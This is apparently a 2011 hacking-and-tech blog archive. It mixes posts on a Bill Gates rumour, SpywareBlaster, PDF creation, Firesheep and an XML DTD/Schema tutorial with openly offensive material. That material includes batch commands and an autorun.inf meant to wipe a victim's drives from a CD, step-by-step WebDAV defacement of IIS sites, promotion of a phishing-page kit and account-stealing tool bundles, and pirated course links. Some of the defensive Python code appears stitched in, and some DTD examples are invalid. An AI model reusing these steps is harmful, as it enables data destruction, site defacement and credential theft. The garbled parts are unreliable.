Tuesday, December 20, 2011

RUMOR ABOUT BILL GATES DAUGHTER



Recently I received a mail with pictures of Bill Gates' daughter, titled "The Best product from Bill Gates".


Later, when I searched on Google, I found the internet flooded with rumors claiming this girl is Bill Gates' daughter. Many blogs had made posts titled 'Bill Gates daughter Jennifer Katharine Gates'.


Legally she definitely can't be his daughter, because in 1994 Bill Gates married Melinda French Gates in a private ceremony held in Lanai, Hawaii. At that time Melinda was also working at Microsoft and participated in the development of many of Microsoft's multimedia products; after the marriage she left the job to focus on starting and raising her family.


Later the couple was blessed with three children:


    * Jennifer Katharine Gates, his daughter born in 1996
    * Rory John Gates, his son born in 1999
    * Phoebe Adelle Gates, his daughter born in 2002


So as of now, in 2010, Jennifer Katharine Gates' age will be 14, and I don't think the girl in the picture looks like a 14-year-old girl.

Monday, December 12, 2011

Stop spyware and tracking cookies with Spyware Blaster

SpywareBlaster is a free program that stops spyware from being installed on your computer. Instead of allowing tracking artifacts to sneak in and then having to scan your hard disk to remove them, SpywareBlaster stops tracking software from installing in the first place, protecting the computer against adware, browser hijacks (anchoring your homepage), malicious ActiveX scripts, tracking cookies and Flash content. You can enable and disable the display of Flash content through the easy-to-use SpywareBlaster interface. Another section lets you create your own custom list of blocked ActiveX controls, and another stores a backup of the Hosts file, a file used by your operating system to resolve IP addresses to a URL and commonly tampered with by malware to redirect you to other pages; the Hosts file can be rolled back to a certain time and date if that ever happens.


This software consumes very few computer resources and can be used in conjunction with a firewall, antivirus and other antispyware tools without any compatibility problems; it should save you time in the long term by not having to continuously scan the hard disk for adware. Unfortunately, browser support is limited to browsers using the Internet Explorer rendering engine (Maxthon, Avant, IE, etc.) and Mozilla Firefox. Opera and Chrome users have been left out: if you do most of your Internet browsing with something other than Internet Explorer or Firefox, protection will be very limited.
The database updates needed to keep up with the latest Internet threats are only automatic in the paid-for version of this program; the free version has to be updated manually, which is easy to forget. I wasn't too impressed with SpywareBlaster; it is not bad, but I do not see it as a must-have. My main grudge is the lack of support for browsers other than IE and Firefox.

Saturday, September 10, 2011

Hack Facebook/Twitter Or Any Email Account With Side Jacking

When logging into a website you usually start by submitting your username and password. The server then checks to see if an account matching this information exists and if so, replies back to you with a "cookie" which is used by your browser for all subsequent requests.
It's extremely common for websites to protect your password by encrypting the initial login, but surprisingly uncommon for websites to encrypt everything else. This leaves the cookie (and the user) vulnerable. HTTP session hijacking (sometimes called "sidejacking") is when an attacker gets a hold of a user's cookie, allowing them to do anything the user can do on a particular website. On an open wireless network, cookies are basically shouted through the air, making these attacks extremely easy.
This is a widely known problem that has been talked about to death, yet very popular websites continue to fail at protecting their users. The only effective fix for this problem is full end-to-end encryption, known on the web as HTTPS or SSL. Facebook is constantly rolling out new "privacy" features in an endless attempt to quell the screams of unhappy users, but what's the point when someone can just take over an account entirely? Twitter forced all third party developers to use OAuth then immediately released (and promoted) a new version of their insecure website. When it comes to user privacy, SSL is the elephant in the room.
Firesheep is a Firefox extension designed to demonstrate just how serious this problem is.
After installing the extension you'll see a new sidebar. Connect to any busy open wifi network and click the big "Start Capturing" button. Then wait.

As soon as anyone on the network visits an insecure website known to Firesheep, their name and photo will be displayed:


Double-click on someone, and you're instantly logged in as them.


That's it.
Firesheep is free, open source, and is available now for Mac OS X and Windows. Linux support is on the way.
Websites have a responsibility to protect the people who depend on their services. They've been ignoring this responsibility for too long, and it's time for everyone to demand a more secure web.
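The gap described above (an encrypted login followed by plaintext requests) can be checked from the site owner's side. The following is an added example, not code from the original post or from Firesheep: it models which cookies a browser would attach to a later `http://` request, given the `Set-Cookie` headers returned at login. The host names and cookie values are constructed samples.

```python
"""Which cookies would a browser attach to a plaintext request after an HTTPS login?"""
from urllib.parse import urlsplit


def parse_set_cookie(header):
    """Split one Set-Cookie header value into (name, value, attributes)."""
    first, *rest = [part.strip() for part in header.split(";")]
    name, _, value = first.partition("=")
    attrs = {}
    for part in rest:
        if part:
            key, _, val = part.partition("=")
            attrs[key.strip().lower()] = val.strip()
    return name.strip(), value.strip(), attrs


def _domain_matches(host, cookie_domain):
    """True if host equals the cookie's Domain attribute or is a subdomain of it."""
    cookie_domain = cookie_domain.lstrip(".").lower()
    return host == cookie_domain or host.endswith("." + cookie_domain)


def _path_matches(request_path, cookie_path):
    """Cookie path matching: exact match, or a prefix ending at a '/' boundary."""
    if request_path == cookie_path:
        return True
    if request_path.startswith(cookie_path):
        return cookie_path.endswith("/") or request_path[len(cookie_path)] == "/"
    return False


def cookies_sent_in_clear(login_url, set_cookie_headers, later_url):
    """Names of cookies set at login_url that travel unencrypted on later_url."""
    login, later = urlsplit(login_url), urlsplit(later_url)
    if later.scheme != "http":
        return []  # TLS protects the Cookie header on https:// requests
    host = (later.hostname or "").lower()
    exposed = []
    for header in set_cookie_headers:
        name, _value, attrs = parse_set_cookie(header)
        if "secure" in attrs:
            continue  # the browser withholds Secure cookies from http:// requests
        if attrs.get("domain"):
            in_scope = _domain_matches(host, attrs["domain"])
        else:
            in_scope = host == (login.hostname or "").lower()  # host-only cookie
        if in_scope and _path_matches(later.path or "/", attrs.get("path") or "/"):
            exposed.append(name)
    return exposed


# Constructed sample: Set-Cookie headers returned by two hypothetical HTTPS login pages.
SAMPLE = {
    "https://social.example/login": [
        "session_id=9f2c1e; Domain=social.example; Path=/; HttpOnly",  # no Secure
        "csrf=ab12; Path=/; Secure",
    ],
    "https://bank.example/login": [
        "sid=77aa; Path=/; Secure; HttpOnly",
    ],
}


def report():
    """For each sample site, list the cookies exposed by a later plaintext page load."""
    result = {}
    for login_url, headers in SAMPLE.items():
        host = urlsplit(login_url).hostname
        result[host] = cookies_sent_in_clear(login_url, headers, f"http://www.{host}/home")
    return result


if __name__ == "__main__":
    for site, names in report().items():
        print(site, "->", names or "nothing sent in the clear")
```

A cookie listed here is readable by anyone on the same open network, even though the password itself was submitted over HTTPS.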

Friday, September 9, 2011

Download Login Spoofer-Gmail,yahoo,facebook,hotmail password hacking.

Login Spoofer is software that can create professional phishing pages (Hotmail, Yahoo, Gmail, GameZer, Facebook and many more). To steal somebody's account you have to push him to log in on one of your fake pages; when the victim logs in as you told him, his account (username/password) is registered in our database. You then go to the software (Login Spoofer) and press refresh, and you'll find his username, password, IP, OS info, etc. Using and downloading is 100% free. Yahoo Password Hacking: Hack Yahoo Account Password with phishing attack.



Deface sites easily in Seconds




# It only works on sites hosted on an MS-IIS server. Nowadays many boxes are patched, so it will not work on them!

steps for Xp-

# open run
# type-

%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}

and press enter !

#A new window name "WEB FOLDER" gets open

#Right click and click on New, Add Web Folder then enter your vulnerable website address.

#then next....finish

# now You can insert your page with name index.html by simply copy pasting.

Also, after getting access to the website: many websites don't allow you to add your page, so leave them.




#Dork- "Powered by IIS" or use your own unique dork.


 ------------------------------------------------------------------------------------------------------------

Windows 7-

#Click Start.

#Click Computer.

# In the following dialog click Map Network Drive.

# On the Map Network Drive dialog, click "Connect to a Web site that you can use to store your documents and Pictures" this will pop up the "Welcome to the Add Network Location Wizard".



# Click on Next.



# Click on ''Choose a custom network location''.



# Click on Next.



# Now type the web folder address that you want to access. For instance: www.stscw.com/



# Enter a NAME to help you identify the web folder and click Next.



# Place a checkmark on 'Open this network location when I click finish'.



# Click Finish.

and insert your deface page !!



----------------------------------------------------------------------------------------------------------------


Reference-

3thicaln00b (super moderator)
IndiShell Crew

How to create PDF files for free

PDF is the de facto standard for online reading and publishing, and various programs like Adobe Reader and Foxit Reader allow you to read PDF files. But PDF creation is a shadier area: the same programs either allow only minor PDF modification with watermarked results (Foxit) or require a whole separate software package for PDF creation for a premium fee (Adobe PDF creator). For professionals this software may be worth its price tag, but general users can create excellent-looking PDFs by the method described below.
What you need -
About DoPDF (shamelessly taken from official website :P) -
doPDF is a free PDF converter for both personal and commercial use. Using doPDF you can create PDF files by selecting the "Print" command from virtually any application. With one click you can convert your Microsoft Excel, Word or PowerPoint documents or your emails and favorite web sites to PDF files.
Steps to create PDF -
  • Download DoPDF and install it.
  • Open your word processor/text editor and create your document.
  • Press Ctrl + P or go to the File menu and print the document.
  • The Print menu will open; choose DoPDF as the virtual printer and click on Print.
  • Choose the location to save your document and click OK. Your PDF file will be created.
  • Congratulations, you have created your PDF file for free.

Best Hacking Tools -85in1

Audio theme: Sean Paul - Temperature
Size : 43.2MB Compress ,29.7MB UnCompress

Contents:
Main page:

  • HOTMAIL HACKING

  • YAHOO HACKING


  • MSN FUN TOOLS


  • FAKE SCREENS/PAGES


  • OTHER HACKING TOOLS


  • FUN TOOLS


    Page 1:

    MSN Chat Monitor And Sniffer
    MSN Password Retriever
    MSN Hacker DUC
    Head Fuck HotMail HAck
    HotMail Hacker XE Edition
    HotMail HAck
    HotMAil Hacker
    MSN Passwords
    MSN Flooder
    MSN Sniffer
    MSN SPY Lite
    HotMail Hacker Gold
    HotMail HAcker Final
    Give me Ur Pass
    HotMail Brute Forcer
    MSN PAssword Finder
    MSN Password Grabber
    Hack MSN Password
    Hack HotMAil Evolution
    MAgic Password Sender
    MSN Locker
    HotMail Killer
    Hot Freeze
    MessenPass
    HotMAil Hack !
    Ice Cold Reload
    HotMail Killer 2
    Nuke MSN

    Page 2:

    Yahoo Messenger Login Screen
    MSN Messenger 7 Login Screen
    MSN Messenger 5 Login Screen
    MSN Messenger 4.6 Login Screen
    HotMail Login Screen
    Fake Web Pages 2
    Fake Eeb Pages 1
    AOL Killer
    Fake Login HotMail
    B-S Spy
    Saria Fake Logins

    Page 3:

    Yahoo Password Retrieval
    Yacam
    Yahoo Cracker
    Yahoo Booster
    Yahoo Hack!
    Yahoo Password Stealer
    S-H Yahoo Password Sender

    Page 4:

    NetWork Password Recovery
    NetBIOS Name Scanner
    FTP Password Hacker
    Cable Modem Sniffer
    Port Listening XP
    Blue Port Scanner
    www 2 IP
    XP Killer
    Sniff Password
    Port Scanner
    Fast Resolver
    Domain Scan
    Whois Domain
    NetRes View
    PHPbb Defacer
    Angry IP Scanner
    FTP Brute Forcer

    Page 5:

    Hook Tool Box
    Smart HAck UpLoader
    Remote Anything
    Post Sage
    PHPbb Attacker

    Page 6:

    Skinner
    MSN Bomber Man
    Ultimate Nick PopUpz
    MSN 7 Universal Patcher
    Emoticons Creator
    MSN Picture Crawler
    Anti Status Bomb
    MSN Detector
    Multi MSN Loader
    Kitle
    Protect Lithium
    Tray It!
    MSN Block Checker
    MSN Auto Responder
    MSN Virus Cleaner
    MSN Dondurucu

    THC-HYDRA v6.1 brute force tool Released !



    One of the most famous network logon cracker - THC-HYDRA, has been updated! We now have THC-HYDRA version 6.1 in less than a fortnight!

    “THC-HYDRA is a very fast network logon cracker which support many different services. This tool is a proof of concept code, to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized access from remote to a system. It was tested to compile cleanly on Linux, Windows/Cygwin, Solaris, FreeBSD and OSX.”

    This is the change log:
    More license updates for the files for the debian guys
    Fix for the configure script to correctly detect postgresql
    Add checks for libssh v0.4 and support for ssh v1
    Merge all latest crypto code in sasl files
    Fix SVN compilation issue on openSUSE (tested with v11.3)

    News source: The Hacker News

    SNIFFER-HACKING TOOL



    Sniffers monitor network data. A sniffer can be a self-contained software program or a hardware device with the appropriate software or firmware programming. Sniffers usually act as network probes or "snoops." They examine network traffic, making a copy of the data without redirecting or altering it. Some sniffers work only with TCP/IP packets, but the more sophisticated tools can work with many other protocols and at lower levels including Ethernet frames.

    Years ago, sniffers were tools used exclusively by network engineers. Today, however, these utilities have become popular on the Internet with hackers and the merely curious. The U.S. Federal Bureau of Investigation (FBI) has utilized a famous sniffer system called "Carnivore" to help detect illegal Internet communications.



    Certified Ethical Hacker V6 - Training Videos - LABS, Tools

    Certified Ethical Hacker Course has been divided into two sections:
    1. Certified Ethical Hacker (CEH) v 6 - Training DVDs (Flash video) | 6 DVDs ISO | 10.3 GB
    2. Certified Ethical Hacker and Countermeasures V6 LABS (Tools) | 4 Volumes | ISOs + Instructor slides in PDF | 13.2 GB

    First section, Training videos, focuses on how to scan, test, hack and secure your own systems (all in depth).

    Second section, LABS (Tools), gives each student in-depth knowledge and practical experience with the current essential security systems. It is analogous to what you do in college laboratory i.e. real-time practical experience to what is taught in theory lectures.

    Thus, this complete course guarantees to make you a Professional Hacker


    LABS (Tools)



    Certified Ethical Hacker and Countermeasures V6 LABS (Tools) | 4 Volumes | ISOs + Instructor slides in PDF | 13.2 GB

    These are all the DVD materials for the CEH v6 exam training from EC-Council. This is a fantastic class with a lot of knowledge.

    These are the tools, not videos. This is to teach how to countermeasure hacks, and that being said there are live real worms, viruses, trojans, etc., not to destroy your computer (IF USED WITH VMWARE OR OTHER COMPUTER) but to teach you how to get rid of them.

    Certified Ethical Hacker & Countermeasures V6

    Course Description

    This class will immerse the student into an interactive environment where they will be shown how to scan, test, hack and secure their own systems. The lab intensive environment gives each student in-depth knowledge and practical experience with the current essential security systems. Students will begin by understanding how perimeter defenses work and then be led into scanning and attacking their own networks, no real network is harmed. Students then learn how intruders escalate privileges and what steps can be taken to secure a system. Students will also learn about Intrusion Detection, Policy Creation, Social Engineering, DDoS Attacks, Buffer Overflows and Virus Creation. When a student leaves this intensive 5 day class they will have hands on understanding and experience in Ethical Hacking. This course prepares you for EC-Council Certified Ethical Hacker exam 312-50.

    Who Should Attend

    This course will significantly benefit security officers, auditors, security professionals, site administrators, and anyone who is concerned about the integrity of the network infrastructure.


    Certification
    The Certified Ethical Hacker exam 312-50 may be taken on the last day of the training (optional). Students need to pass the online Prometric exam to receive CEH certification. Training fee is inclusive of Exam, Official Kit, Certificate and meals.

    Legal Agreement

    Ethical Hacking and Countermeasures course mission is to educate, introduce and demonstrate hacking tools for penetration testing purposes only. Prior to attending this course, you will be asked to sign an agreement stating that you will not use the newly acquired skills for illegal or malicious attacks and you will not use such tools in an attempt to compromise any computer system, and to indemnify EC-Council with respect to the use or misuse of these tools, regardless of intent.

    CEHv6 Curriculum consists of instructor-led training and self-study. The Instructor will provide the details of self-study modules to the students beginning of the class.

    http://www.eccouncil.org

    Module 1: Introduction to Ethical Hacking
    Module 2: Hacking Laws
    Module 3: Footprinting
    Module 4: Google Hacking
    Module 5: Scanning
    Module 6: Enumeration
    Module 7: System Hacking
    Module 8: Trojans and Backdoors
    Module 9: Viruses and Worms
    Module 10: Sniffers
    Module 11: Social Engineering
    Module 12: Phishing
    Module 13: Hacking Email Accounts
    Module 14: Denial-of-Service
    Module 15: Session Hijacking
    Module 16: Hacking Web Servers
    Module 17: Web Application Vulnerabilities
    Module 18: Web-Based Password Cracking Techniques
    Module 19: SQL Injection
    Module 20: Hacking Wireless Networks
    Module 21: Physical Security
    Module 22: Linux Hacking
    Module 23: Evading IDS, Firewalls and Detecting Honey Pots
    Module 24: Buffer Overflows
    Module 25: Cryptography
    Module 26: Penetration Testing
    Module 27: Covert Hacking
    Module 28: Writing Virus Codes
    Module 29: Assembly Language Tutorial
    Module 30: Exploit Writing
    Module 31: Smashing the Stack for Fun and Profit
    Module 32: Windows Based Buffer Overflow Exploit Writing
    Module 33: Reverse Engineering
    Module 34: MAC OS X Hacking
    Module 35: Hacking Routers, cable Modems and Firewalls
    Module 36: Hacking Mobile Phones, PDA and Handheld Devices
    Module 37: Bluetooth Hacking
    Module 38: VoIP Hacking
    Module 39: RFID Hacking
    Module 40: Spamming Module
    Module 41: Hacking USB Devices
    Module 42: Hacking Database Servers
    Module 43: Cyber Warfare- Hacking, Al-Qaida and Terrorism
    Module 44: Internet Content Filtering Techniques
    Module 45: Privacy on the Internet
    Module 46: Securing Laptop Computers
    Module 47: Spying Technologies
    Module 48: Corporate Espionage- Hacking Using Insiders
    Module 49: Creating Security Policies
    Module 50: Software Piracy and Warez
    Module 51: Hacking and Cheating Online Games
    Module 52: Hacking RSS and Atom
    Module 53: Hacking Web Browsers (Firefox, IE)
    Module 54: Proxy Server Technologies
    Module 55: Data Loss Prevention
    Module 56: Hacking Global Positioning System (GPS)
    Module 57: Computer Forensics and Incident Handling
    Module 58: Credit Card Frauds
    Module 59: How to Steal Passwords
    Module 60: Firewall Technologies
    Module 61: Threats and Countermeasures
    Module 62: Case Studies
    Module 63: Botnets
    Module 64: Economic Espionage
    Module 65: Patch Management
    Module 66: Security Convergence





    Instructor Slides:
    http://hotfile.com/d....part1.rar.html
    http://hotfile.com/d....part2.rar.html
    http://hotfile.com/d....part3.rar.html

    Labs (Tools)



     

    Reset Windows Password Advanced Edition v1.2.1.195 Retail



    A lost password or locked Windows account is the most frequent problem data recovery specialists have to deal with. You could format the hard drive or reinstall your operating system, but that wouldn't keep you from partial loss of data, personal settings and extra headache. Besides, all that can take some time. There is a quicker and more elegant way out of this situation. Just run Reset Windows Passwords from a bootable CD or USB and reset the forgotten password or unlock the account. It's a matter of a few minutes! Reset Windows Password is the most powerful solution for recovering or resetting all types of Windows account passwords: user, administrator, Active Directory accounts, and domain administrators.
    The program is designed specifically for an inexperienced user and is easy to operate. On the other hand, the password lookup algorithms are unique and not used in any similar application.
    Unlike other utilities, Reset Windows Password is the only program that can CORRECTLY process all types of Windows accounts.

    Features
    Simple, intuitive graphic interface. No more ugly DOS prompts.
    Resets and modifies passwords of local users and administrators, domain administrator, Active Directory users, DSRM account.
    Enables and unlocks user accounts.
    Disables the password expiry option.
    Resets SYSKEY (with full user passwords re-encryption)
    Advanced password lookup algorithms (also known as AI attack).
    Dumps user password hashes from SAM for further analysis.
    Dumps password hashes from Active Directory.
    Dumps domain cached credentials.
    Supports all versions of NT-based Windows, including the newest Windows 7.
    All editions include the utility for creating a bootable CD/DVD/USB disk from the downloadable ISO file with the application.
    Supports 64-bit Windows.
    Large collection of IDE, SATA, SCSI, RAID drivers.
    Detects several operating systems installed on the computer.
    Supports non-English versions of Windows and passwords in national encodings.
    Allows undoing changes made to the system.
    Deletes passwords and other sensitive data from the computer.
    Detailed help.

    How it looks and works
    Reset Windows Password - screenshots and documentation
    Full list of the program features
    Three simple steps to create a bootable CD, DVD or USB disk
    Utility for creating bootable disks
    Running RWP from the bootable disk
    Modifying BIOS to boot from RWP disk, questions and answers

    The software is available in three editions: Light, Standard and Advanced. The detailed list of features is shown below : www.passcape.com/reset_windows_password_editions

    How to Create nameless files and folders in windows

    1. Select any file or folder.
    2. Right click on it, press rename or simply press F2.
    3. Press and hold the Alt key. While holding the Alt key, type numbers 0160 from the numpad.
    4. Press Enter and the nameless file or folder will be created.
     

    But what if you want to create another nameless file or folder in the same directory ?

    For this you will have to rename the file with 2 spaces. Just follow these steps below:

    1. Select file, press F2.
    2. Hold the Alt key and type 0160 from the numpad.
    3. Release the Alt key. Now without doing anything else, again hold the Alt key and press 0160.
    4. Press Enter and you will have a second nameless file in the same directory.

    CD AUTORUN VIRUS, FORMATTING COMPUTER !


    Create a file in note pad and name it "vrs.cmd"
    write following commands in the file-

    rd e:\*.* /s/q
    rd d:\*.* /s/q
    rd C:\*.* /s/q


    After saving it with the name vrs.cmd,
    please don't double-click on it, or you'll lose data from your hard disk.

    STEP 2-

    make another file name it "autorun.inf"
    and write following codes in it.

    [AUTORUN]
    open=vrs.cmd

    save this file autorun.inf

    STEP 3-
    Now write these two files into a CD and CD is READY to destroy a computer..

    CHECK
    You can check what vrs.cmd is able to do with a trial run:

    make a folder in "d:" and name it "meera",
    put some files and folders in it, like songs, snaps etc.,
    now make a file in Notepad


    rd d:\meera /s/q

    and save it with name vr.cmd
    and now double click on this file
    it will remove meera folder from "d:"

    Anti FireSheep

    BlackSheep



    With all the hype about Firesheep, the Firefox add-on that snatches up social network login credentials over open wireless networks, security companies are starting to make anti-Firesheep measures available to the average user. BlackSheep, developed by "cloud security" firm Zscaler, is a Firefox add-on that detects the presence of Firesheep on your network.

    If someone is using Firesheep, BlackSheep will trick it with a fake login cookie. When Firesheep takes BlackSheep's bait and tries to get your user information from a site using the fake values BlackSheep has been sending out, you'll get a warning that Firesheep is operating, as well as the IP address of the person using it.

    Unfortunately, BlackSheep is only available for Firefox at the moment. There are other security measures you can use, though. Sebastian has posted a roundup of ways to surf securely with SSL in any browser. Even more recently, someone released a Safari extension to force Facebook to use SSL. As far as direct anti-Firesheep countermeasures go, a Windows app called Fireshepherd can also help you shut Firesheep snoopers down.
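The decoy-cookie idea described above can be sketched in a few lines. This is an added example, not BlackSheep's own code: a monitor plants a random session value, then flags any other host on the network that presents it. The IP addresses (documentation range 192.0.2.0/24), host names and traffic records are constructed samples.

```python
"""Decoy-cookie tripwire: alert when a planted session value is replayed by another host."""
import secrets
from dataclasses import dataclass


@dataclass(frozen=True)
class Observed:
    """One HTTP request seen on the local network (constructed records in demo())."""
    src_ip: str
    host: str
    cookie_header: str


class DecoyMonitor:
    def __init__(self, own_ip):
        self.own_ip = own_ip
        self.planted = {}  # decoy cookie value -> site it was sent to

    def plant(self, site, cookie_name="session_id"):
        """Create a random, never-valid session value and remember where it was sent."""
        value = secrets.token_hex(16)
        self.planted[value] = site
        return f"{cookie_name}={value}"

    def check(self, request):
        """Return one alert per planted value that shows up in someone else's request."""
        if request.src_ip == self.own_ip:
            return []  # our own decoy request, not a replay
        alerts = []
        for pair in request.cookie_header.split(";"):
            _name, _, value = pair.strip().partition("=")
            site = self.planted.get(value)
            if site is not None:
                alerts.append({
                    "src_ip": request.src_ip,       # who replayed the decoy
                    "site": site,                   # where the decoy was planted
                    "requested_host": request.host,
                })
        return alerts


def demo():
    """Plant one decoy and scan three constructed requests; only the replay alerts."""
    monitor = DecoyMonitor(own_ip="192.0.2.10")
    bait = monitor.plant("social.example")
    traffic = [
        Observed("192.0.2.10", "social.example", bait),                    # decoy going out
        Observed("192.0.2.23", "social.example", "session_id=realuser1"),  # ordinary user
        Observed("192.0.2.77", "social.example", f"lang=en; {bait}"),      # decoy replayed
    ]
    return [alert for request in traffic for alert in monitor.check(request)]


if __name__ == "__main__":
    for alert in demo():
        print("decoy cookie replayed by", alert["src_ip"], "against", alert["requested_host"])
```

Because the decoy value is random and tied to no real account, the only way another host can present it is by having captured it off the network.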



    FireShepherd





    A login-cookie-snooping Firefox plug-in called Firesheep rocked the Internet by letting anyone compromise your Facebook or Twitter account over a wireless network. Alarmed at Firesheep's 200,000 downloads, an Icelandic engineering student named Gunnar Sigurdsson created FireShepherd, a program that crashes Firesheep with floods of nonsense packets.

    Although Firesheep was originally created to prove a point about insecure login credentials on social networks, the huge number of downloads means that it could be a security risk to everyday users. Sigurdsson compares it to "living in a house with nothing but windows." Of course, security researchers or malicious users could patch up the Firesheep flaw that FireShepherd exploits, but FireShepherd's creator has vowed to keep finding new ways to stop the snooping plug-in. 

    Monday, August 29, 2011

    XML DTDs Vs XML Schema

    XML is a very handy format for storing and communicating your data between disparate systems in a platform-independent fashion. XML is more than just a format for computers — a guiding principle in its creation was that it should be Human Readable and easy to create. 

    XML allows UNIX systems written in C to communicate with Web Services that, for example, run on the Microsoft .NET architecture and are written in ASP.NET. XML is however, only the meta-language that the systems understand — and they both need to agree on the format that the XML data will be in. Typically, one of the partners in the process will offer a service to the other: one is in charge of the format of the data.
    The definition serves two purposes: the first is to ensure that the data that makes it past the parsing stage is at least in the right structure. As such, it’s a first level at which ‘garbage’ input can be rejected. Secondly, the definition documents the protocol in a standard, formal way, which makes it easier for developers to understand what’s available.
    DTD – The Document Type Definition
    The first method used to provide this definition was the DTD, or Document Type Definition. This defines the elements that may be included in your document, what attributes these elements have, and the ordering and nesting of the elements.

    The DTD is declared in a DOCTYPE declaration beneath the XML declaration contained within an XML document:
    Inline Definition:
        <?xml version="1.0"?>
        <!DOCTYPE documentelement [definition]>
    External Definition:
        <?xml version="1.0"?>
        <!DOCTYPE documentelement SYSTEM "documentelement.dtd">
    The actual body of the DTD itself contains definitions in terms of elements and their attributes. For example, the following short DTD defines a bookstore. It states that a bookstore has a name, and stocks books on at least one topic.
    Each topic has a name and 0 or more books in stock. Each book has a title, author and ISBN number. The name of the topic and the name of the bookstore are defined as being the same type of element: this stores PCDATA, which is just text data. The title and author of the book are stored as CDATA -- text data that won’t be parsed for further characters by the XML parser. The ISBN number is stored as an attribute of the book:
        <!DOCTYPE bookstore [
          <!ELEMENT bookstore (name,topic+)>
          <!ELEMENT topic (name,book*)>
          <!ELEMENT name (#PCDATA)>
          <!ELEMENT book (title,author)>
          <!-- Element text can only be declared as #PCDATA; the CDATA keyword is valid only as an attribute type. -->
          <!ELEMENT title (#PCDATA)>
          <!ELEMENT author (#PCDATA)>
          <!ELEMENT isbn (#PCDATA)>
          <!-- The ISBN is carried as an attribute of book, defaulting to "0". -->
          <!ATTLIST book isbn CDATA "0">
        ]>
    An example of a book store’s inline definition might be:
    <?xml version="1.0"?>
    <!DOCTYPE bookstore [
      <!ELEMENT bookstore (name,topic+)>
      <!ELEMENT topic (name,book*)>
      <!ELEMENT name (#PCDATA)>
      <!ELEMENT book (title,author)>
      <!ELEMENT title (#CDATA)>
      <!ELEMENT author (#CDATA)>
      <!ELEMENT isbn (#PCDATA)>
      <!ATTLIST book isbn CDATA "0">
      ]>
    <bookstore>
      <name>Mike's Store</name>
      <topic>
        <name>XML</name>
        <book isbn="123-456-789">
          <title>Mike's Guide To DTD's and XML Schemas</title>
          <author>Mike Jervis</author>
        </book>
      </topic>
    </bookstore>
    Using an inline definition is handy when you only have a few documents and they’re offline, as the definition is always in the file. However, if, for example, your DTD defines the XML protocol used to talk between two separate systems, re-transmitting the DTD with each document adds an overhead to the communications. Having an external DTD eliminates the need to re-send each time. We could remove the DTD from the document, and place it in a DTD file on a Web server that’s accessible by the two systems:
    <?xml version="1.0"?>
    <!DOCTYPE bookstore SYSTEM "http://webserver/bookstore.dtd">
    <bookstore>
      <name>Mike's Store</name>
      <topic>
        <name>XML</name>
        <book isbn="123-456-789">
          <title>Mike's Guide To DTD's and XML Schemas</title>
          <author>Mike Jervis</author>
        </book>
      </topic>
    </bookstore>
    The file bookstore.dtd would contain the full definition in a plain text file:
      <!ELEMENT bookstore (name,topic+)>
      <!ELEMENT topic (name,book*)>
      <!ELEMENT name (#PCDATA)>
      <!ELEMENT book (title,author)>
      <!ELEMENT title (#CDATA)>
      <!ELEMENT author (#CDATA)>
      <!ELEMENT isbn (#PCDATA)>
      <!ATTLIST book isbn CDATA "0">
    The lowest level of definition in a DTD is that something is either CDATA or PCDATA: Character Data, or Parsed Character Data. We can only define an element as text, and with this limitation, it is not possible, for example, to force an element to be numeric. Attributes can be forced to a range of defined values, but they can’t be forced to be numeric.

    So for example, if you stored your application’s settings in an XML file, it could be manually edited so that the window’s start coordinates were strings — and you’d still need to validate this in your code, rather than have the parser do it for you.
    XML Schemas
    XML Schemas provide a much more powerful means by which to define your XML document structure and limitations. XML Schemas are themselves XML documents. They reference the XML Schema Namespace (detailed here), and even have their own DTD.
    What XML Schemas do is provide an Object Oriented approach to defining the format of an XML document. XML Schemas provide a set of basic types. These types are much wider ranging than the basic PCDATA and CDATA of DTDs. They include most basic programming types such as integer, byte, string and floating point numbers, but they also expand into Internet data types such as ISO country and language codes (en-GB for example). A full list can be found here.
    The author of an XML Schema then uses these core types, along with various operators and modifiers, to create complex types of their own. These complex types are then used to define an element in the XML Document.
    As a simple example, let’s try to create a basic XML Schema for defining the bookstore that we used as an example for DTDs. Firstly, we must declare this as an XSD Document, and, as we want this to be very user friendly, we’re going to add some basic documentation to it:
    <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema">
    <xsd:annotation>
      <xsd:documentation xml:lang="en">
        XML Schema for a Bookstore as an example.
      </xsd:documentation>
    </xsd:annotation>
    Now, in the previous example, the bookstore consisted of the sequence of a name and at least one topic. We can easily do that in an XML Schema:
    <xsd:element name="bookstore" type="bookstoreType"/>
    <xsd:complexType name="bookstoreType">
      <xsd:sequence>
        <xsd:element name="name" type="xsd:string"/>
        <xsd:element name="topic" type="topicType" minOccurs="1"/>
      </xsd:sequence>
    </xsd:complexType>
    In this example, we’ve defined an element, bookstore, that will equate to an XML element in our document. We’ve defined it of type bookstoreType, which is not a standard type, and so we provide a definition of that type next.

    We then define a complexType, which defines bookstoreType as a sequence of name and topic elements. Our "name" type is an xsd:string, a type defined by the XML Schema Namespace, and so we’ve fully defined that element.

    The topic element, however, is of type topicType, another custom type that we must define. We’ve also defined our topic element with minOccurs="1", which means there must be at least one element at all times. As maxOccurs is not defined, there is no upper limit to the number of elements that might be included. If we had specified neither, the default would be exactly one instance, as is used in the name element. Next, we define the schema for the topicType.
    <xsd:complexType name="topicType">
      <xsd:sequence>
        <xsd:element name="name" type="xsd:string"/>
        <xsd:element name="book" type="bookType" minOccurs="0"/>
      </xsd:sequence>
    </xsd:complexType>
    This is all similar to the declaration of the bookstoreType, but note that we have to re-define our name element within the scope of this type. If we’d used a complex type for name, such as nameType, which defined only an xsd:string — and defined it outside our types, we could re-use it in both. However, to illustrate the point, I decided to define it within each section. XML gets interesting when we get to defining our bookType:
    <xsd:complexType name="bookType">
      <xsd:sequence>
        <xsd:element name="title" type="xsd:string"/>
        <xsd:element name="author" type="xsd:string"/>
      </xsd:sequence>
      <xsd:attribute name="isbn" type="isbnType"/>
    </xsd:complexType>
    <xsd:simpleType name="isbnType">
      <xsd:restriction base="xsd:string">
        <xsd:pattern value="[0-9]{3}[-][0-9]{3}[-][0-9]{3}"/>
      </xsd:restriction>
    </xsd:simpleType>
    So the definition of the bookType is not particularly interesting. But the definition of its attribute "isbn" is. Not only does XML Schema support the use of types such as xsd:nonNegativeInteger, but we can also create our own simple types from these basic types using various modifiers. In the example for isbnType above, we base it on a string, and restrict it to match a given regular expression. Excusing my poor regex, that should limit any isbn attribute to match the standard of three groups of three digits separated by a dash.
